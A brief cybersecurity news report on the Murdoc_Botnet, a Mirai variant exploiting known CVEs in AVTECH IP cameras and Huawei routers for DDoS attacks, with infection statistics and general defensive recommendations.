
Security researchers have identified a new large-scale cybersecurity threat dubbed “Murdoc_Botnet,” a Mirai variant targeting AVTECH IP cameras and Huawei HG532 routers. The campaign, active since July 2024, has already infected over 1,370 systems, primarily affecting devices in Malaysia, Mexico, Thailand, Indonesia, and Vietnam.
The botnet exploits known vulnerabilities, including CVE-2017-17215 and CVE-2024-7029, to compromise IoT devices. Once accessed, the malware deploys through a shell script that downloads architecture-specific payloads, ultimately weaponizing the infected devices for DDoS attacks.
This development follows other recent Mirai variants, such as “gayfemboy,” which targeted Four-Faith industrial routers. A separate large-scale DDoS campaign has also emerged, targeting Japanese corporations and banks, with additional targets in the U.S., Bahrain, Poland, Spain, Israel, and Russia.
The attack pattern predominantly affects telecommunications, technology, hosting, cloud computing, banking, gaming, and financial services sectors. India leads in compromised devices at 55%, followed by South Africa, Brazil, Bangladesh, and Kenya.
Security Recommendations:
– Monitor suspicious processes and network traffic
– Apply regular firmware updates
– Change default device credentials
– Implement robust network monitoring
The botnet’s enhanced capabilities and widespread impact highlight the growing sophistication of IoT-targeted cyber threats.